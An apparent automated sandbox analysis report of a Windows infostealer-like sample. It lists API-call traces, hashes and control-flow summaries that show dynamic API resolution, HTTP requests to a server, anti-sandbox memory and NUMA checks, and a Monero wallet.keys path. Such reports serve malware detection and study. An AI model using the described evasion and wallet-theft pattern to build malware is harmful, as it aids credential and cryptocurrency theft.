                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 84d075260fe9d2ec4cc6f28b22bdcea61d4aafbbba1e454d5ef03849a160c869
                            • Instruction ID: 77ebac9a5b1c9fa0551549a77ea7899f3a979fe401d4ecdc2faccc524f593597
                            • Opcode Fuzzy Hash: 84d075260fe9d2ec4cc6f28b22bdcea61d4aafbbba1e454d5ef03849a160c869
                            • Instruction Fuzzy Hash: E112E871951218AADB58EB90DD92FEFB33ABF54340F50819DB106620D1EF702E49CF6A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 12ed1b349578da8d31b7cd11d6b2489a41a3d178886c294b5cf02fe83bb72c29
                            • Instruction ID: d028aae41791f3c8b619519cc72615f25e8092ec2267f17b0c4a4eff53c5d191
                            • Opcode Fuzzy Hash: 12ed1b349578da8d31b7cd11d6b2489a41a3d178886c294b5cf02fe83bb72c29
                            • Instruction Fuzzy Hash: 46F04FB1D44208ABC704DF98DD49BAFFBB8FB44721F10066AFA45A2680C77515048BA1
                            APIs
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: fad2e512a7905643431189ed152adeddb4ea6c1149a214913812ac577592a821
                            • Instruction ID: 60b35a0515792a522096d716403202fc93697222079c144a2416af8b2b77113d
                            • Opcode Fuzzy Hash: fad2e512a7905643431189ed152adeddb4ea6c1149a214913812ac577592a821
                            • Instruction Fuzzy Hash: CBD05E7490030CDBCB04EFE0D889AEDBB78FB48321F000954D94562340EA315491CAA6

                            Control-flow Graph (function starting at 609c10; graph rendering not available in this text export, legend: Executed / Not Executed)
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013F65A0), ref: 00609C2D
                            • GetProcAddress.KERNEL32(75900000,013F64E0), ref: 00609C45
                            • GetProcAddress.KERNEL32(75900000,01408F40), ref: 00609C5E
                            • GetProcAddress.KERNEL32(75900000,01408EF8), ref: 00609C76
                            • GetProcAddress.KERNEL32(75900000,0140CA30), ref: 00609C8E
                            • GetProcAddress.KERNEL32(75900000,0140C988), ref: 00609CA7
                            • GetProcAddress.KERNEL32(75900000,013FAFC8), ref: 00609CBF
                            • GetProcAddress.KERNEL32(75900000,0140C838), ref: 00609CD7
                            • GetProcAddress.KERNEL32(75900000,0140C880), ref: 00609CF0
                            • GetProcAddress.KERNEL32(75900000,0140CA48), ref: 00609D08
                            • GetProcAddress.KERNEL32(75900000,0140C9A0), ref: 00609D20
                            • GetProcAddress.KERNEL32(75900000,013F64C0), ref: 00609D39
                            • GetProcAddress.KERNEL32(75900000,013F65C0), ref: 00609D51
                            • GetProcAddress.KERNEL32(75900000,013F62A0), ref: 00609D69
                            • GetProcAddress.KERNEL32(75900000,013F63E0), ref: 00609D82
                            • GetProcAddress.KERNEL32(75900000,0140CA60), ref: 00609D9A
                            • GetProcAddress.KERNEL32(75900000,0140C8C8), ref: 00609DB2
                            • GetProcAddress.KERNEL32(75900000,013FB180), ref: 00609DCB
                            • GetProcAddress.KERNEL32(75900000,013F62C0), ref: 00609DE3
                            • GetProcAddress.KERNEL32(75900000,0140C928), ref: 00609DFB
                            • GetProcAddress.KERNEL32(75900000,0140C850), ref: 00609E14
                            • GetProcAddress.KERNEL32(75900000,0140CAA8), ref: 00609E2C
                            • GetProcAddress.KERNEL32(75900000,0140C7F0), ref: 00609E44
                            • GetProcAddress.KERNEL32(75900000,013F64A0), ref: 00609E5D
                            • GetProcAddress.KERNEL32(75900000,0140CA78), ref: 00609E75
                            • GetProcAddress.KERNEL32(75900000,0140CA00), ref: 00609E8D
                            • GetProcAddress.KERNEL32(75900000,0140C9B8), ref: 00609EA6
                            • GetProcAddress.KERNEL32(75900000,0140CAC0), ref: 00609EBE
                            • GetProcAddress.KERNEL32(75900000,0140C940), ref: 00609ED6
                            • GetProcAddress.KERNEL32(75900000,0140C8E0), ref: 00609EEF
                            • GetProcAddress.KERNEL32(75900000,0140C868), ref: 00609F07
                            • GetProcAddress.KERNEL32(75900000,0140CA90), ref: 00609F1F
                            • GetProcAddress.KERNEL32(75900000,0140CAD8), ref: 00609F38
                            • GetProcAddress.KERNEL32(75900000,01409A38), ref: 00609F50
                            • GetProcAddress.KERNEL32(75900000,0140C808), ref: 00609F68
                            • GetProcAddress.KERNEL32(75900000,0140C958), ref: 00609F81
                            • GetProcAddress.KERNEL32(75900000,013F6500), ref: 00609F99
                            • GetProcAddress.KERNEL32(75900000,0140C898), ref: 00609FB1
                            • GetProcAddress.KERNEL32(75900000,013F6360), ref: 00609FCA
                            • GetProcAddress.KERNEL32(75900000,0140C8B0), ref: 00609FE2
                            • GetProcAddress.KERNEL32(75900000,0140CA18), ref: 00609FFA
                            • GetProcAddress.KERNEL32(75900000,013F6380), ref: 0060A013
                            • GetProcAddress.KERNEL32(75900000,013F6400), ref: 0060A02B
                            • LoadLibraryA.KERNEL32(0140C9D0,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A03D
                            • LoadLibraryA.KERNEL32(0140C820,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A04E
                            • LoadLibraryA.KERNEL32(0140C8F8,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A060
                            • LoadLibraryA.KERNEL32(0140C9E8,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A072
                            • LoadLibraryA.KERNEL32(0140C910,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A083
                            • LoadLibraryA.KERNEL32(0140C970,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A095
                            • LoadLibraryA.KERNEL32(0140CC40,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A0A7
                            • LoadLibraryA.KERNEL32(0140CD90,?,00605CA3,00610AEB,?,?,?,?,?,?,?,?,?,?,00610AEA,00610AE3), ref: 0060A0B8
                            • GetProcAddress.KERNEL32(75FD0000,013F6920), ref: 0060A0DA
                            • GetProcAddress.KERNEL32(75FD0000,0140CCE8), ref: 0060A0F2
                            • GetProcAddress.KERNEL32(75FD0000,014088F0), ref: 0060A10A
                            • GetProcAddress.KERNEL32(75FD0000,0140CB68), ref: 0060A123
                            • GetProcAddress.KERNEL32(75FD0000,013F6A00), ref: 0060A13B
                            • GetProcAddress.KERNEL32(734B0000,013FB1A8), ref: 0060A160
                            • GetProcAddress.KERNEL32(734B0000,013F68E0), ref: 0060A179
                            • GetProcAddress.KERNEL32(734B0000,013FB0B8), ref: 0060A191
                            • GetProcAddress.KERNEL32(734B0000,0140CC10), ref: 0060A1A9
                            • GetProcAddress.KERNEL32(734B0000,0140CAF0), ref: 0060A1C2
                            • GetProcAddress.KERNEL32(734B0000,013F6860), ref: 0060A1DA
                            • GetProcAddress.KERNEL32(734B0000,013F6760), ref: 0060A1F2
                            • GetProcAddress.KERNEL32(734B0000,0140CC88), ref: 0060A20B
                            • GetProcAddress.KERNEL32(763B0000,013F6740), ref: 0060A22C
                            • GetProcAddress.KERNEL32(763B0000,013F6720), ref: 0060A244
                            • GetProcAddress.KERNEL32(763B0000,0140CD60), ref: 0060A25D
                            • GetProcAddress.KERNEL32(763B0000,0140CBE0), ref: 0060A275
                            • GetProcAddress.KERNEL32(763B0000,013F6880), ref: 0060A28D
                            • GetProcAddress.KERNEL32(750F0000,013FB2C0), ref: 0060A2B3
                            • GetProcAddress.KERNEL32(750F0000,013FB270), ref: 0060A2CB
                            • GetProcAddress.KERNEL32(750F0000,0140CD78), ref: 0060A2E3
                            • GetProcAddress.KERNEL32(750F0000,013F69E0), ref: 0060A2FC
                            • GetProcAddress.KERNEL32(750F0000,013F68A0), ref: 0060A314
                            • GetProcAddress.KERNEL32(750F0000,013FB0E0), ref: 0060A32C
                            • GetProcAddress.KERNEL32(75A50000,0140CDC0), ref: 0060A352
                            • GetProcAddress.KERNEL32(75A50000,013F66C0), ref: 0060A36A
                            • GetProcAddress.KERNEL32(75A50000,01408850), ref: 0060A382
                            • GetProcAddress.KERNEL32(75A50000,0140CC58), ref: 0060A39B
                            • GetProcAddress.KERNEL32(75A50000,0140CCD0), ref: 0060A3B3
                            • GetProcAddress.KERNEL32(75A50000,013F6A20), ref: 0060A3CB
                            • GetProcAddress.KERNEL32(75A50000,013F66E0), ref: 0060A3E4
                            • GetProcAddress.KERNEL32(75A50000,0140CDA8), ref: 0060A3FC
                            • GetProcAddress.KERNEL32(75A50000,0140CDD8), ref: 0060A414
                            • GetProcAddress.KERNEL32(75070000,013F6680), ref: 0060A436
                            • GetProcAddress.KERNEL32(75070000,0140CB20), ref: 0060A44E
                            • GetProcAddress.KERNEL32(75070000,0140CB08), ref: 0060A466
                            • GetProcAddress.KERNEL32(75070000,0140CBC8), ref: 0060A47F
                            • GetProcAddress.KERNEL32(75070000,0140CD00), ref: 0060A497
                            • GetProcAddress.KERNEL32(74E50000,013F67E0), ref: 0060A4B8
                            • GetProcAddress.KERNEL32(74E50000,013F66A0), ref: 0060A4D1
                            • GetProcAddress.KERNEL32(75320000,013F68C0), ref: 0060A4F2
                            • GetProcAddress.KERNEL32(75320000,0140CBB0), ref: 0060A50A
                            • GetProcAddress.KERNEL32(6F060000,013F6700), ref: 0060A530
                            • GetProcAddress.KERNEL32(6F060000,013F6820), ref: 0060A548
                            • GetProcAddress.KERNEL32(6F060000,013F6980), ref: 0060A560
                            • GetProcAddress.KERNEL32(6F060000,0140CB38), ref: 0060A579
                            • GetProcAddress.KERNEL32(6F060000,013F6780), ref: 0060A591
                            • GetProcAddress.KERNEL32(6F060000,013F67A0), ref: 0060A5A9
                            • GetProcAddress.KERNEL32(6F060000,013F67C0), ref: 0060A5C2
                            • GetProcAddress.KERNEL32(6F060000,013F6800), ref: 0060A5DA
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0060A5F1
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0060A607
                            • GetProcAddress.KERNEL32(74E00000,0140CBF8), ref: 0060A629
                            • GetProcAddress.KERNEL32(74E00000,01408910), ref: 0060A641
                            • GetProcAddress.KERNEL32(74E00000,0140CB50), ref: 0060A659
                            • GetProcAddress.KERNEL32(74E00000,0140CB80), ref: 0060A672
                            • GetProcAddress.KERNEL32(74DF0000,013F6960), ref: 0060A693
                            • GetProcAddress.KERNEL32(6F9A0000,0140CCA0), ref: 0060A6B4
                            • GetProcAddress.KERNEL32(6F9A0000,013F6840), ref: 0060A6CD
                            • GetProcAddress.KERNEL32(6F9A0000,0140CB98), ref: 0060A6E5
                            • GetProcAddress.KERNEL32(6F9A0000,0140CCB8), ref: 0060A6FD
                            Strings
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: cd73409a490ad3f6dcffea36e77490b79142dbf0846a1cfe3da623e33e2df5a4
                            • Instruction ID: 637d21998c58bfc7b59318bec828b2f48000f52966f9c6730aeb789c894ae29f
                            • Opcode Fuzzy Hash: cd73409a490ad3f6dcffea36e77490b79142dbf0846a1cfe3da623e33e2df5a4
                            • Instruction Fuzzy Hash: 8A621AB5505200AFC74CDFA8ED88D663BF9F7EC7017148D2AA6C9C3264D73A9841DB52

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • InternetOpenA.WININET(00610DFE,00000001,00000000,00000000,00000000), ref: 005F62E1
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6335
                            • HttpOpenRequestA.WININET(00000000,GET,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F6385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F63BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F63D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005F63FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005F646D
                            • InternetCloseHandle.WININET(00000000), ref: 005F64EF
                            • InternetCloseHandle.WININET(00000000), ref: 005F64F9
                            • InternetCloseHandle.WININET(00000000), ref: 005F6503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: b1763fc8377ff26cac640968802109a61fd7e533e0c0a18cf00ae8a8cff3b43c
                            • Instruction ID: 4825e931fc69550dbe1243b6cc180a0c6205e3ace09168732623454e6d0a1e88
                            • Opcode Fuzzy Hash: b1763fc8377ff26cac640968802109a61fd7e533e0c0a18cf00ae8a8cff3b43c
                            • Instruction Fuzzy Hash: 63713D71A40318ABDF18EBA0DC89FEE7B79BB44700F108598F6096B1D0DBB46A85CF51

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0060A820: lstrlen.KERNEL32(005F4F05,?,?,005F4F05,00610DDE), ref: 0060A82B
                              • Part of subcall function 0060A820: lstrcpy.KERNEL32(00610DDE,00000000), ref: 0060A885
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006056A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605857
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 006051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605228
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 006052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605318
                              • Part of subcall function 006052C0: lstrlen.KERNEL32(00000000), ref: 0060532F
                              • Part of subcall function 006052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00605364
                              • Part of subcall function 006052C0: lstrlen.KERNEL32(00000000), ref: 00605383
                              • Part of subcall function 006052C0: lstrlen.KERNEL32(00000000), ref: 006053AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0060578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00605A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 20affdf4a6af844ebff306a30938b095f3ef9b74e64371dc7337c09245e7506d
                            • Instruction ID: 264df64fd2835cf5439b6f3362c5b22813c370f8325f592869879f7fdb0cf188
                            • Opcode Fuzzy Hash: 20affdf4a6af844ebff306a30938b095f3ef9b74e64371dc7337c09245e7506d
                            • Instruction Fuzzy Hash: 81E11D719502089ADB4CFBE0DC56EEF733ABB94340F40852CB507661D1EF34AA49CBA6

                            Control-flow Graph

                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 006017C5
                            • ExitProcess.KERNEL32 ref: 006017D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 3c59f16b71f26a3bf26e4fcedca30fc7090c19a2d660a5d661951ffd81290f95
                            • Instruction ID: da9c4cd5e17b11e3558ccb7bba75935ced5c282880d9fc78c7147d3b093d4334
                            • Opcode Fuzzy Hash: 3c59f16b71f26a3bf26e4fcedca30fc7090c19a2d660a5d661951ffd81290f95
                            • Instruction Fuzzy Hash: 205129B4A44209EFDB08DFA4D964AFF77B6BF45704F108458E406AB280D770E992CB62

                            Control-flow Graph

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00607542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0060757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0060760A
                            • wsprintfA.USER32 ref: 00607640
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$a
                            • API String ID: 1544550907-2828524113
                            • Opcode ID: 85c8723c609f2675431079220cc60d8a2616c8da6b76fef202dfe3c5c0c16689
                            • Instruction ID: 56a9726eefc2ca1acf281287666ef60e6df3a831f6c86581719964664ff0c570
                            • Opcode Fuzzy Hash: 85c8723c609f2675431079220cc60d8a2616c8da6b76fef202dfe3c5c0c16689
                            • Instruction Fuzzy Hash: FC41C0B1D44248ABDB18DF94DC85BEEBBB9BF58700F100198F509672C0DB75AA44CFA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400618), ref: 006098A1
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400720), ref: 006098BA
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014005A0), ref: 006098D2
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014005B8), ref: 006098EA
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014007F8), ref: 00609903
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01408890), ref: 0060991B
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,013F6480), ref: 00609933
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,013F65E0), ref: 0060994C
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014007B0), ref: 00609964
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,014007E0), ref: 0060997C
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400810), ref: 00609995
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400708), ref: 006099AD
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,013F6440), ref: 006099C5
                              • Part of subcall function 00609860: GetProcAddress.KERNEL32(75900000,01400840), ref: 006099DE
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 005F11D0: ExitProcess.KERNEL32 ref: 005F1211
                              • Part of subcall function 005F1160: GetSystemInfo.KERNEL32(?), ref: 005F116A
                              • Part of subcall function 005F1160: ExitProcess.KERNEL32 ref: 005F117E
                              • Part of subcall function 005F1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
                              • Part of subcall function 005F1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
                              • Part of subcall function 005F1110: ExitProcess.KERNEL32 ref: 005F1143
                              • Part of subcall function 005F1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
                              • Part of subcall function 005F1220: ExitProcess.KERNEL32 ref: 005F1294
                              • Part of subcall function 00606770: GetUserDefaultLangID.KERNEL32 ref: 00606774
                              • Part of subcall function 005F1190: ExitProcess.KERNEL32 ref: 005F11C6
                              • Part of subcall function 00607850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607880
                              • Part of subcall function 00607850: RtlAllocateHeap.NTDLL(00000000), ref: 00607887
                              • Part of subcall function 00607850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
                              • Part of subcall function 006078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607910
                              • Part of subcall function 006078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00607917
                              • Part of subcall function 006078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00606AF9
                            • Sleep.KERNEL32(00001770), ref: 00606B04
                            • CloseHandle.KERNEL32(?,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606B1A
                            • ExitProcess.KERNEL32 ref: 00606B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2931873225-0
                            • Opcode ID: 5e8c12a63cfc836e89c3af7d88879e9e35f1035da7cb8423da661a59994581b0
                            • Instruction ID: bd28ad8c57bebb7541662bbb8e8c0709ae355f2114454960ce37927c72e075e0
                            • Opcode Fuzzy Hash: 5e8c12a63cfc836e89c3af7d88879e9e35f1035da7cb8423da661a59994581b0
                            • Instruction Fuzzy Hash: DD310971A90209AADB4CF7E0DC56BEF777ABF44380F004518F242A61D2DF746905C6AA

                            Control-flow Graph

                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00606AF9
                            • Sleep.KERNEL32(00001770), ref: 00606B04
                            • CloseHandle.KERNEL32(?,00000000,?,014089E0,?,0061110C,?,00000000,?,00611110,?,00000000,00610AEF), ref: 00606B1A
                            • ExitProcess.KERNEL32 ref: 00606B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 233af0fce57abca33272be171d661835b9f3b519a848fc9a283464fa4a7b5c68
                            • Instruction ID: 0415258a951b2b83895d6a887a802404fd837de626e6e6879e71ac1153669f95
                            • Opcode Fuzzy Hash: 233af0fce57abca33272be171d661835b9f3b519a848fc9a283464fa4a7b5c68
                            • Instruction Fuzzy Hash: 56F0BE70AC030AABE708BBA0CC0ABBF7B35FB04300F104918B943A11C1CBB05551DA5A

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: f5f42dba7ef49e2ec42106a1fbcc587583d8b40559fbcaeb2f414ee72ee420a4
                            • Instruction ID: b6f8818f03a3c97ea48f7af5043600e1e19925ae43efd16602cabb3f262d34d8
                            • Opcode Fuzzy Hash: f5f42dba7ef49e2ec42106a1fbcc587583d8b40559fbcaeb2f414ee72ee420a4
                            • Instruction Fuzzy Hash: 90215EB1D00209ABDF14DFA4EC49ADE7B79FB44320F108629F955A72D0EB706A09CB81

                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F6280: InternetOpenA.WININET(00610DFE,00000001,00000000,00000000,00000000), ref: 005F62E1
                              • Part of subcall function 005F6280: StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6303
                              • Part of subcall function 005F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6335
                              • Part of subcall function 005F6280: HttpOpenRequestA.WININET(00000000,GET,?,0140DB30,00000000,00000000,00400100,00000000), ref: 005F6385
                              • Part of subcall function 005F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F63BF
                              • Part of subcall function 005F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F63D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605228
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: eac490a2c7a73129107710ea7a6d0a30d9db5803111112bc57a3b76734b25767
                            • Instruction ID: 4f750e866e92f913839312540dfd83e15e322276c334c98c61211fa7ad53a040
                            • Opcode Fuzzy Hash: eac490a2c7a73129107710ea7a6d0a30d9db5803111112bc57a3b76734b25767
                            • Instruction Fuzzy Hash: 6E112130940208A7DB5CFFA0DD56EEE773AAF90340F40815CF90A5A1D2EF34AB06CA95

                            Control-flow Graph (rendered graph not preserved in this export; the executed / not-executed colouring is lost). Basic blocks and edges recovered from the graph text:
                            • 5f1220-5f1247 (call sub_6089b0, GlobalMemoryStatusEx) -> 5f1249-5f1271 (call sub_60da00 twice) or -> 5f1273-5f127a
                            • 5f1249-5f1271 -> 5f1281-5f1285; 5f1273-5f127a -> 5f1281-5f1285
                            • 5f1281-5f1285 -> 5f129a-5f129d (falls through, no exit) or -> 5f1287
                            • 5f1287 -> 5f1289-5f1290 or -> 5f1292-5f1294 (ExitProcess)
                            • 5f1289-5f1290 -> 5f129a-5f129d or -> 5f1292-5f1294 (ExitProcess)
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
                            • ExitProcess.KERNEL32 ref: 005F1294
                            Memory Dump Source and IDA Plugin snapshot: identical to those listed in full for the first function record above (source dump at offset 005F0000, snapshot hcaresult_0_2_5f0000_file.jbxd)
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 229ced96b01c11d10c9003afd2c338a279313219fad64ddff27213fb3dffb6a6
                            • Instruction ID: 0ca4c0cd145a653a461ee7d653060c235609d62154d899799f8a677da1b6c049
                            • Opcode Fuzzy Hash: 229ced96b01c11d10c9003afd2c338a279313219fad64ddff27213fb3dffb6a6
